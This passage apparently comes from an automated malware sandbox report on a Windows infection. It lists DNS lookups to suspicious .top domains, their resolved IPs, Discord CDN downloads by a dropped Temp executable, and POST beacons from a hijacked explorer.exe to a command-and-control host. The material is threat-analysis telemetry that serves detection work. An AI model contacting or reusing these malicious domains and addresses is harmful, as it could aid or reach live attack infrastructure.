                                                            Oct 29, 2021 20:11:01.975271940 CEST53565628.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:02.114846945 CEST5359153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:02.133939981 CEST53535918.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:02.286952019 CEST5968853192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:02.306128025 CEST53596888.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:06.838769913 CEST5603253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:06.858334064 CEST53560328.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:09.425611973 CEST6115053192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:09.443144083 CEST53611508.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:09.989037037 CEST6345853192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:10.006409883 CEST53634588.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:13.150305986 CEST5042253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:13.249139071 CEST53504228.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:16.373176098 CEST5324753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:16.392899990 CEST53532478.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:19.524187088 CEST5381453192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:19.543862104 CEST53538148.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:23.990077972 CEST5130553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:24.009481907 CEST53513058.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:24.022042990 CEST5367053192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:24.042779922 CEST53536708.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:31.692521095 CEST6141453192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:31.727085114 CEST53614148.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:32.203031063 CEST6384753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:32.544063091 CEST53638478.8.8.8192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Oct 29, 2021 20:10:11.239000082 CEST192.168.2.58.8.8.80x23b3Standard query (0)xacokuo8.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:11.268511057 CEST192.168.2.58.8.8.80x6741Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:11.823913097 CEST192.168.2.58.8.8.80x5287Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:12.026576996 CEST192.168.2.58.8.8.80xd5fbStandard query (0)privacytoolzforyou-6000.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:15.316878080 CEST192.168.2.58.8.8.80x8cc6Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:16.149118900 CEST192.168.2.58.8.8.80xd1a1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.227278948 CEST192.168.2.58.8.8.80xedecStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.690587044 CEST192.168.2.58.8.8.80xc58eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.859009027 CEST192.168.2.58.8.8.80x395eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:32.056253910 CEST192.168.2.58.8.8.80x8fcStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:32.567047119 CEST192.168.2.58.8.8.80xb4f5Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.493403912 CEST192.168.2.58.8.8.80x94cdStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.653253078 CEST192.168.2.58.8.8.80x780bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.809900045 CEST192.168.2.58.8.8.80xfe85Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.975539923 CEST192.168.2.58.8.8.80x63e4Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.630606890 CEST192.168.2.58.8.8.80x7bc4Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:40.465881109 CEST192.168.2.58.8.8.80xd134Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:40.632698059 CEST192.168.2.58.8.8.80xfd08Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.579632044 CEST192.168.2.58.8.8.80xf755Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.569708109 CEST192.168.2.58.8.8.80xd49dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.751832962 CEST192.168.2.58.8.8.80x6e6bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.922758102 CEST192.168.2.58.8.8.80x786eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:47.834711075 CEST192.168.2.58.8.8.80x2bcdStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.419089079 CEST192.168.2.58.8.8.80xc3ddStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.582366943 CEST192.168.2.58.8.8.80x1da0Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.744607925 CEST192.168.2.58.8.8.80x7ec5Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.913070917 CEST192.168.2.58.8.8.80x8ca9Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:50.739057064 CEST192.168.2.58.8.8.80xd045Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:50.911510944 CEST192.168.2.58.8.8.80x60deStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.080089092 CEST192.168.2.58.8.8.80x2c86Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.242697001 CEST192.168.2.58.8.8.80xe939Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.421006918 CEST192.168.2.58.8.8.80xc306Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:55.809906960 CEST192.168.2.58.8.8.80xac36Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:55.985213995 CEST192.168.2.58.8.8.80x2463Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:56.252724886 CEST192.168.2.58.8.8.80x16a0Standard query (0)sysaheu90.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.739132881 CEST192.168.2.58.8.8.80xfe1dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:59.940984011 CEST192.168.2.58.8.8.80xf8aaStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.144890070 CEST192.168.2.58.8.8.80x55b5Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.432073116 CEST192.168.2.58.8.8.80x323bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.654155970 CEST192.168.2.58.8.8.80xb42eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.987481117 CEST192.168.2.58.8.8.80xf23eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.209394932 CEST192.168.2.58.8.8.80x2642Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.419742107 CEST192.168.2.58.8.8.80x3f5bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.612200975 CEST192.168.2.58.8.8.80x426Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.787048101 CEST192.168.2.58.8.8.80xf54bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.956099033 CEST192.168.2.58.8.8.80x2bddStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:02.114846945 CEST192.168.2.58.8.8.80x49daStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:02.286952019 CEST192.168.2.58.8.8.80xfde6Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:06.838769913 CEST192.168.2.58.8.8.80xef46Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:09.425611973 CEST192.168.2.58.8.8.80x5478Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:09.989037037 CEST192.168.2.58.8.8.80x6db5Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:13.150305986 CEST192.168.2.58.8.8.80x3696Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:16.373176098 CEST192.168.2.58.8.8.80x283cStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:19.524187088 CEST192.168.2.58.8.8.80xd35fStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:23.990077972 CEST192.168.2.58.8.8.80xa01dStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:24.022042990 CEST192.168.2.58.8.8.80x60b4Standard query (0)toptelete.topA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:31.692521095 CEST192.168.2.58.8.8.80xa069Standard query (0)nusurtal4f.netA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.203031063 CEST192.168.2.58.8.8.80x733eStandard query (0)znpst.topA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Oct 29, 2021 20:10:11.258455038 CEST8.8.8.8192.168.2.50x23b3Name error (3)xacokuo8.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:11.671344042 CEST8.8.8.8192.168.2.50x6741No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:11.843478918 CEST8.8.8.8192.168.2.50x5287No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:12.045677900 CEST8.8.8.8192.168.2.50xd5fbNo error (0)privacytoolzforyou-6000.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:15.686341047 CEST8.8.8.8192.168.2.50x8cc6No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:16.168242931 CEST8.8.8.8192.168.2.50xd1a1No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.514676094 CEST8.8.8.8192.168.2.50xedecNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.713120937 CEST8.8.8.8192.168.2.50xc58eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:31.880048990 CEST8.8.8.8192.168.2.50x395eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:32.423012972 CEST8.8.8.8192.168.2.50x8fcNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:32.586476088 CEST8.8.8.8192.168.2.50xb4f5No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.512619019 CEST8.8.8.8192.168.2.50x94cdNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.672538996 CEST8.8.8.8192.168.2.50x780bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.829308987 CEST8.8.8.8192.168.2.50xfe85No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:36.994990110 CEST8.8.8.8192.168.2.50x63e4No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.652573109 CEST8.8.8.8192.168.2.50x7bc4No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.652573109 CEST8.8.8.8192.168.2.50x7bc4No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.652573109 CEST8.8.8.8192.168.2.50x7bc4No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.652573109 CEST8.8.8.8192.168.2.50x7bc4No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:38.652573109 CEST8.8.8.8192.168.2.50x7bc4No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:40.485739946 CEST8.8.8.8192.168.2.50xd134No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:40.652132034 CEST8.8.8.8192.168.2.50xfd08No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.602001905 CEST8.8.8.8192.168.2.50xf755No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.602001905 CEST8.8.8.8192.168.2.50xf755No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.602001905 CEST8.8.8.8192.168.2.50xf755No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.602001905 CEST8.8.8.8192.168.2.50xf755No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:43.602001905 CEST8.8.8.8192.168.2.50xf755No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.589178085 CEST8.8.8.8192.168.2.50xd49dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.771209955 CEST8.8.8.8192.168.2.50x6e6bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:44.941961050 CEST8.8.8.8192.168.2.50x786eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.220582008 CEST8.8.8.8192.168.2.50x2bcdNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.438671112 CEST8.8.8.8192.168.2.50xc3ddNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.601681948 CEST8.8.8.8192.168.2.50x1da0No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.764193058 CEST8.8.8.8192.168.2.50x7ec5No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:48.932560921 CEST8.8.8.8192.168.2.50x8ca9No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:50.758750916 CEST8.8.8.8192.168.2.50xd045No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:50.930922031 CEST8.8.8.8192.168.2.50x60deNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.099366903 CEST8.8.8.8192.168.2.50x2c86No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.260781050 CEST8.8.8.8192.168.2.50xe939No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:51.440727949 CEST8.8.8.8192.168.2.50xc306No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:55.827872038 CEST8.8.8.8192.168.2.50xac36No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:56.004759073 CEST8.8.8.8192.168.2.50x2463No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:56.540116072 CEST8.8.8.8192.168.2.50x16a0No error (0)sysaheu90.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.758337021 CEST8.8.8.8192.168.2.50xfe1dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.758337021 CEST8.8.8.8192.168.2.50xfe1dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.758337021 CEST8.8.8.8192.168.2.50xfe1dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.758337021 CEST8.8.8.8192.168.2.50xfe1dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:57.758337021 CEST8.8.8.8192.168.2.50xfe1dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:10:59.960449934 CEST8.8.8.8192.168.2.50xf8aaNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.161952019 CEST8.8.8.8192.168.2.50x55b5No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.451416016 CEST8.8.8.8192.168.2.50x323bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:00.673628092 CEST8.8.8.8192.168.2.50xb42eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.006988049 CEST8.8.8.8192.168.2.50xf23eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.228509903 CEST8.8.8.8192.168.2.50x2642No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.439146042 CEST8.8.8.8192.168.2.50x3f5bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.631324053 CEST8.8.8.8192.168.2.50x426No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.806180954 CEST8.8.8.8192.168.2.50xf54bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:01.975271940 CEST8.8.8.8192.168.2.50x2bddNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:02.133939981 CEST8.8.8.8192.168.2.50x49daNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:02.306128025 CEST8.8.8.8192.168.2.50xfde6No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:06.858334064 CEST8.8.8.8192.168.2.50xef46Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:09.443144083 CEST8.8.8.8192.168.2.50x5478No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:10.006409883 CEST8.8.8.8192.168.2.50x6db5Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:13.249139071 CEST8.8.8.8192.168.2.50x3696Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:16.392899990 CEST8.8.8.8192.168.2.50x283cName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:19.543862104 CEST8.8.8.8192.168.2.50xd35fName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:24.009481907 CEST8.8.8.8192.168.2.50xa01dName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:24.042779922 CEST8.8.8.8192.168.2.50x60b4No error (0)toptelete.top172.67.160.46A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:24.042779922 CEST8.8.8.8192.168.2.50x60b4No error (0)toptelete.top104.21.9.146A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:31.727085114 CEST8.8.8.8192.168.2.50xa069No error (0)nusurtal4f.net45.141.84.21A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top61.98.7.132A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top222.236.49.124A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top211.168.197.211A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top175.119.10.231A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top109.98.58.98A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top61.98.7.133A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top211.171.233.127A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top84.117.126.4A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top179.52.22.168A (IP address)IN (0x0001)
                                                            Oct 29, 2021 20:11:32.544063091 CEST8.8.8.8192.168.2.50x733eNo error (0)znpst.top148.255.17.227A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • cdn.discordapp.com
                                                            • xauocndh.com
                                                              • hajezey1.top
                                                            • gurxx.org
                                                            • privacytoolzforyou-6000.top
                                                            • ktkcvjuue.com
                                                            • adlotmsqn.net
                                                            • edkykp.com
                                                            • koyxalg.com
                                                            • hxdci.com
                                                            • uixmltkfi.net
                                                            • uqqrnpr.org
                                                            • ihqsjj.org
                                                            • civbpqln.com
                                                            • pqobqf.org
                                                            • cuuhert.net
                                                            • cpmovtar.org
                                                            • csbokajdc.com
                                                            • adqaqqqe.org
                                                            • bjcvackirk.com
                                                            • lylgknghko.net
                                                            • wexymhl.com
                                                            • glqydpsa.net
                                                            • kqbwtkcju.org
                                                            • mdonp.com
                                                            • hfxrwj.org
                                                            • jxvawpr.net
                                                            • ctbemocusw.net
                                                            • wofjmrw.com
                                                            • xdcmurwfts.com
                                                            • drroxf.net
                                                            • lqvvicnwkv.com
                                                            • hmylopjj.org
                                                            • sysaheu90.top
                                                            • pvxvmaqhni.net
                                                            • bhlsdp.net
                                                            • vexln.com
                                                            • ukjpg.net
                                                            • oahqstcrl.org
                                                            • sowcs.net
                                                            • yhtqeo.com
                                                            • wepobp.org
                                                            • uriot.org
                                                            • isqhctlhh.net
                                                            • pbejr.net
                                                            • ufipchi.com
                                                            • vlotoun.net
                                                            • toptelete.top
                                                            • 91.219.236.97

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.549804162.159.130.233443C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.549805162.159.130.233443C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10192.168.2.549779185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:31.570542097 CEST1612OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://edkykp.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 369
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:31.649379969 CEST1615INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:31 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11192.168.2.549781185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:31.771764040 CEST1617OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://koyxalg.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 115
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:31.847259998 CEST1619INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:31 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
